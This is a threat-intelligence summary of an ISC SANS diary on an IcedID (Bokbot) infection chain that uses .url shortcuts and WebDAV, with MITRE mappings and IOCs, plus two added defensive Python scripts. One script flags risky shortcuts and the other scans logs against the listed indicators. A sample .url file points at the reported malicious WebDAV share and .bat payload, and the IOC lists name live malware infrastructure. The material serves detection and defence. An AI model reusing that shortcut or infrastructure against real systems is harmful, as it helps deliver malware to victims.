An ISC SANS diary documents an IcedID (Bokbot) infection that uses .url and WebDAV to fetch and run its payload, including a 64-bit DLL retrieved from mandalorecnote.com. The report catalogs the WebDAV activity, the payload delivery chain, and the IOCs and infrastructure observed in this wave. #IcedID #Bokbot #WebDAV #mandalorecnote #PO61467
Keypoints
- IcedID is delivered via .url files that contact a WebDAV server and trigger a BAT file that loads the installer DLL.
- The infection uses WebDAV traffic (PROPFIND and GET) to retrieve components from a remote server and execute the payload.
- WebDAV activity is accompanied by a follow-on GET to mandalorecnote.com/images that returns a decoy 64-bit DLL, likely for distraction or signaling this wave.
- Observed IOCs include a large set of .url files (VirusTotal), specific SHA-256 hashes, and multiple domains/IPs used for C2 or decoy traffic.
- Post-compromise activity includes persistent DLLs loaded via rundll32.exe and gzip binary downloads from ituitem.net.
- Final IOCs list includes WebDAV host at 104.156.149.6, C2 domains such as renomesolar.com, palasedelareforma.com, and noosaerty.com.
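The delivery chain above starts with a Windows .url (InternetShortcut) file whose target is a remote WebDAV share rather than a web page. The following triage script is an added example written for this summary, not code from the ISC diary: it parses .url content, extracts the target, and flags shortcuts that point at a UNC or file:// path on an external host or at a file Windows would execute or load. The sample .url content, the `/webdav/` share name and the `.corp.local` internal suffix are constructed assumptions; the IP and the PO_61467.bat file name come from the summary.

```python
import configparser
import ipaddress
from urllib.parse import urlparse

# Extensions the shell runs or loads when the shortcut target is opened.
# .bat and .dll appear in the diary; the others are added for coverage (assumption).
EXEC_EXTENSIONS = {".bat", ".cmd", ".dll", ".exe", ".js", ".vbs", ".hta", ".lnk", ".msi"}


def parse_url_shortcut(text):
    """Return the URL= value of the [InternetShortcut] section, or None if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return cp[section].get("url")  # configparser lowercases option names
    return None


def remote_target(url):
    """Return (host, path) when the target is a UNC or file:// path on another host, else None."""
    u = url.strip()
    if u.startswith("\\\\"):                       # \\host\share\file
        host, _, rest = u[2:].partition("\\")
        return host, "\\" + rest
    p = urlparse(u)
    if p.scheme.lower() == "file":
        if not p.netloc and p.path.startswith("//"):   # file:////host/share/file
            host, _, rest = p.path[2:].partition("/")
            return host, "/" + rest
        if p.netloc and p.netloc.lower() != "localhost":  # file://host/share/file
            return p.netloc, p.path
    return None


def host_is_external(host, internal_suffixes):
    """True for a public IP or a name outside the configured internal suffixes."""
    h = host.split("@")[0].split(":")[0]  # drop UNC @port/@SSL and :port decorations
    try:
        return not ipaddress.ip_address(h).is_private
    except ValueError:
        return not h.lower().endswith(tuple(internal_suffixes))


def triage_url_shortcut(text, internal_suffixes=(".corp.local",)):
    """Classify one .url file's content; 'suspicious' means remote target that is external or executable."""
    target = parse_url_shortcut(text)
    result = {"target": target, "host": None, "remote": False,
              "external": False, "executable": False, "suspicious": False}
    if not target:
        return result
    rt = remote_target(target)
    if rt is None:
        return result
    host, path = rt
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
    result.update(host=host, remote=True,
                  external=host_is_external(host, internal_suffixes),
                  executable=ext in EXEC_EXTENSIONS)
    result["suspicious"] = result["external"] or result["executable"]
    return result


# Constructed sample mirroring the chain in the summary: shortcut -> WebDAV share -> .bat.
# The share path is an assumption; only the IP and the .bat name come from the summary.
MALICIOUS_SAMPLE = """[InternetShortcut]
URL=file://104.156.149.6/webdav/PO_61467.bat
IconIndex=3
IconFile=C:\\Windows\\System32\\SHELL32.dll
"""

BENIGN_SAMPLE = """[InternetShortcut]
URL=https://isc.sans.edu/
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage_url_shortcut(sample))
```

Explorer resolves a file:// or UNC target by trying SMB first and falling back to the WebClient (WebDAV) service, which is why an internet-facing share in a .url file is worth flagging even before any payload is fetched; feeding this over a mail-gateway quarantine or a VirusTotal hunting pull of .url samples is the intended use.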
MITRE Techniques
- [T1566.001] Phishing – “For email-based distribution, we’ve seen OneNote files as an initial lure this month (here’s one example).”
- [T1189] Drive-by Compromise – The malware is “delivered by fake software sites from Google ad traffic.”
- [T1059.003] Windows Command Shell – “The .bat file runs a DLL installer for IcedID on the same server at \\104.156.149[.]6\webdav\host.dll.”
- [T1071.001] Web Protocols – “This WebDAV activity generated several HTTP PROPFIND and GET requests.”
- [T1105] Ingress Tool Transfer – “The .url and .bat files both use WebDAV to retrieve and run the malware.”
- [T1218.011] Signed Binary Proxy Execution: Rundll32 – “Run method: rundll32.exe [filename],XSSCheckStart.”
Indicators of Compromise
- [URL] Infection indicators – 22 .url files found on VirusTotal contacting the malicious WebDAV server – PO#56034.url, PO#15986.url, and 20 more .url files
- [SHA256] File hashes – 0a79166f95d1f1a3542135241ea42026188916ea9c06510c20247849c5ad6f0e, 0dfd67dafe621b57eac338e581d65598197cdb0a499a8345fa9beeae9196d8e8
- [SHA256] File hashes – 2bdc4b5aa6b3f9395065f2c31ba130ecc21fbe4db3fcdb3c60a526e34e72bd74, 2c814c61891a1b3b9067b82b5357d13505b4ced6fd827fdde4c3116efb3f9cef
- [IP] WebDAV server – 104.156.149.6; another observed host for C2-like traffic – 5.61.47.8
- [Domain] C2/decoy domains – mandalorecnote.com, ituitem.net
- [Domain] Additional infrastructure – renomesolar.com, palasedelareforma.com, noosaerty.com
- [File name] PO#61467.url; PO_61467.bat – files observed as part of the delivery chain
- [File] host.dll, host.dll.manifest – DLLs retrieved and used in the infection flow
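To turn the IOC list and the MITRE mapping above into something that runs over telemetry, here is an added detection example (written for this summary, not taken from the ISC diary). It scans a constructed event feed of HTTP proxy, process-creation and file-hash records, matching the IPs, domains, hashes and file names listed above, and adds one behavioural rule from the WebDAV key points: a PROPFIND request to a non-internal host, which fires on unknown infrastructure as well. The pipe-delimited event format, the timestamps, the internal 10.0.0.0/8 network, the `/webdav/` share path and the pairing of a listed hash with a sample file path are all constructed assumptions; IPs in the 198.51.100.0/24 documentation range stand in for unlisted external hosts.

```python
import ipaddress
import re

# IOCs as listed in the summary above (plain form, without the "[.]" defanging).
IOC_IPS = {"104.156.149.6", "5.61.47.8"}
IOC_DOMAINS = {"mandalorecnote.com", "ituitem.net", "renomesolar.com",
               "palasedelareforma.com", "noosaerty.com"}
IOC_SHA256 = {
    "0a79166f95d1f1a3542135241ea42026188916ea9c06510c20247849c5ad6f0e",
    "0dfd67dafe621b57eac338e581d65598197cdb0a499a8345fa9beeae9196d8e8",
    "2bdc4b5aa6b3f9395065f2c31ba130ecc21fbe4db3fcdb3c60a526e34e72bd74",
    "2c814c61891a1b3b9067b82b5357d13505b4ced6fd827fdde4c3116efb3f9cef",
}
IOC_FILENAMES = {"po#61467.url", "po_61467.bat", "host.dll", "host.dll.manifest"}
RUNDLL_EXPORT = "XSSCheckStart"   # export named in the diary's run method

# Address ranges treated as internal (assumption: RFC 1918 plus loopback/link-local).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+(?P<dll>[^,\s]+),\s*(?P<export>\w+)", re.I)


def is_internal(ip):
    """True when the address falls inside one of the internal ranges; non-IPs count as external."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def scan_line(line):
    """Return (technique, reason) findings for one event. Event formats (constructed):
    http|ts|src_ip|dst_ip|method|host_header|uri
    proc|ts|endpoint|command_line
    file|ts|endpoint|path|sha256
    """
    fields = line.rstrip("\n").split("|")
    kind = fields[0]
    findings = []
    if kind == "http":
        _, _ts, _src, dst, method, host, uri = fields
        if method.upper() == "PROPFIND" and not is_internal(dst):
            findings.append(("T1071.001", f"WebDAV PROPFIND to external host {dst}"))
        if dst in IOC_IPS or host.lower() in IOC_DOMAINS:
            findings.append(("T1105", f"request to known IcedID infrastructure {host}"))
        name = uri.rsplit("/", 1)[-1].lower()
        if name in IOC_FILENAMES:
            findings.append(("T1105", f"retrieval of known delivery-chain file {name}"))
    elif kind == "proc":
        _, _ts, _host, cmdline = fields
        m = RUNDLL_RE.search(cmdline)
        if m and m.group("export") == RUNDLL_EXPORT:
            findings.append(("T1218.011", f"rundll32 export {RUNDLL_EXPORT} on {m.group('dll')}"))
    elif kind == "file":
        _, _ts, _host, path, sha256 = fields
        if sha256.lower() in IOC_SHA256:
            findings.append(("IOC", f"known IcedID SHA-256 for {path}"))
    return findings


def scan(lines):
    """Scan an iterable of event lines; return (line_number, technique, reason) tuples."""
    return [(n, tech, reason)
            for n, line in enumerate(lines, 1)
            for tech, reason in scan_line(line)]


# Constructed events reproducing the chain in the summary, plus benign and unknown-host noise.
SAMPLE_EVENTS = [
    "http|2023-03-15T10:02:11Z|10.0.0.12|104.156.149.6|PROPFIND|104.156.149.6|/webdav/",
    "http|2023-03-15T10:02:12Z|10.0.0.12|104.156.149.6|GET|104.156.149.6|/webdav/PO_61467.bat",
    "http|2023-03-15T10:02:14Z|10.0.0.12|104.156.149.6|GET|104.156.149.6|/webdav/host.dll",
    "proc|2023-03-15T10:02:15Z|WIN10-01|rundll32.exe C:\\Users\\u\\AppData\\Local\\Temp\\host.dll,XSSCheckStart",
    # hash is one of the listed SHA-256 values; its pairing with this path is constructed
    "file|2023-03-15T10:02:15Z|WIN10-01|C:\\Users\\u\\AppData\\Local\\Temp\\sample.bin|0a79166f95d1f1a3542135241ea42026188916ea9c06510c20247849c5ad6f0e",
    "http|2023-03-15T10:02:20Z|10.0.0.12|198.51.100.7|GET|mandalorecnote.com|/images/",
    "http|2023-03-15T10:05:00Z|10.0.0.12|198.51.100.9|PROPFIND|198.51.100.9|/share/",
    "http|2023-03-15T10:06:00Z|10.0.0.12|10.0.0.50|PROPFIND|files.corp.local|/dav/",
    "http|2023-03-15T10:07:00Z|10.0.0.12|198.51.100.20|GET|www.example.com|/",
]

if __name__ == "__main__":
    for n, tech, reason in scan(SAMPLE_EVENTS):
        print(f"line {n}: [{tech}] {reason}")
```

The IOC matches will age out as the infrastructure changes; the PROPFIND-to-external rule and the rundll32 export match are the parts worth keeping as standing detections, since the internal-share request on line 8 shows the rule stays quiet for legitimate WebDAV use inside the network.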
Read more: https://isc.sans.edu/diary/URL+files+and+WebDAV+used+for+IcedID+Bokbot+infection/29578/